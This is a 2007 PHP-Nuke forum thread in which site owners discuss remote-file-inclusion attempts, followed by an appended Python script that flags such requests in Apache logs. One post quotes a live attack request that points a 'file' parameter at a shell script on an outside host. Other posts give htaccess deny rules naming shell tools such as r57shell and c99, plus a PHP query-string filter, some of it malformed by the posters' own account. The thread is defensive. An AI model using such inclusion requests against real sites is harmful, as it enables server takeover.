Nuke Cops :: View topic - Is this an attack??
Evaders99 (Site Admin)
Joined: Aug 17, 2003
Posts: 12482

Posted: Wed Oct 17, 2007 3:25 pm

Well, Sentinel does that kind of blocking code. It can also report abusers to your email and ban their IP. You can easily tell Sentinel to block silently if you're not concerned about email reports.

XenoMorpH (Lieutenant)
Joined: Aug 24, 2003
Posts: 187
Location: Coevorden, Netherlands

Posted: Sat Oct 20, 2007 2:50 am

I'm getting about 20-30 blocks a day by this shell url. When people try to hack my site, I'm tracing back the source of the file and email the web/server owner about this. This way I have shut down a lot of those urls with those shells. Most of them were hosted on free accounts of tripod.lycos or yahoo, so it was easy to shut them down. But with this site it's not that easy....

drdan01 (Corporal)
Joined: Dec 23, 2004
Posts: 66

Posted: Sat Dec 22, 2007 8:32 pm

I hate to jump onto this thread but it looks like I'm having this exact same bunch of hackers after me.

I've been posting in a couple of threads about something that I've been seeing on my site. Am running Nuke 7.5 and Sentinel, and it looks like I've got the same guys after me as the original poster. But I'm wondering if they're getting through. Here's what I've been seeing and in the static portion of my site:

Quote:
/static.php?file=http://amyru.h18.ru/images/cs.txt?


Do the above suggestions apply to me, things that I should modify/change?
drdan01 (Corporal)
Joined: Dec 23, 2004
Posts: 66

Posted: Sat Dec 22, 2007 9:57 pm

Quote:


RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^libwww(-FM|-perl) [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR
RewriteRule ^.* - [F,L]

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]]



I did try adding the above in my htaccess, but something wasn't right as I then couldn't access my site....ended up taking it back out...site access is fine again.
drdan01 (Corporal)
Joined: Dec 23, 2004
Posts: 66

Posted: Sun Dec 23, 2007 6:23 am

telli wrote:
All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
   header('Location: http://' . $_SERVER['SERVER_NAME']);
   exit;
}



I did try the above and based on my logs it looks like it's now been about 12 hours since the last successful attack.

And have also discovered that I can add the following to my htaccess file and not have site problems like when adding the entire recommended addition:

Quote:
RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]

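Added example (not part of the thread, and not Sentinel or PHP-Nuke code): a small Python log-triage script for the question raised above of whether these requests are "getting through". It scans Apache access-log lines for query parameters whose decoded value is a remote URL and reports the response status; the log lines, the host name remote.example and the IP addresses are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that is itself a remote URL (tested after decoding).
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2007:20:31:02 +0000] "GET /static.php?file=http://remote.example/cs.txt? HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Dec/2007:06:20:11 +0000] "GET /static.php?file=http://remote.example/cs.txt? HTTP/1.1" 403 289',
    '198.51.100.7 - - [23/Dec/2007:06:21:40 +0000] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 8044',
    '203.0.113.5 - - [23/Dec/2007:06:25:03 +0000] "GET /static.php?file=HTTP%3A%2F%2Fremote.example%2Fcs.txt HTTP/1.1" 302 0',
]

def find_remote_includes(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, when, method, target, status = m.groups()
        # parse_qsl percent-decodes, so http%3A%2F%2F is seen as http://
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "client": client, "time": when, "param": name,
                    "url": value, "status": int(status),
                    # 403 = rewrite rule's [F]; 302 = config.php redirect;
                    # 2xx = the request reached the script unblocked
                    "served": status.startswith("2"),
                })
    return hits

if __name__ == "__main__":
    for h in find_remote_includes(SAMPLE_LOG):
        label = "SERVED" if h["served"] else "blocked"
        print(h["time"], h["client"], h["status"], label, h["param"], h["url"])
```

A 2xx entry only shows that the request was not rejected by the rewrite rule or the config.php check; whether the include itself ran still has to be checked in the application.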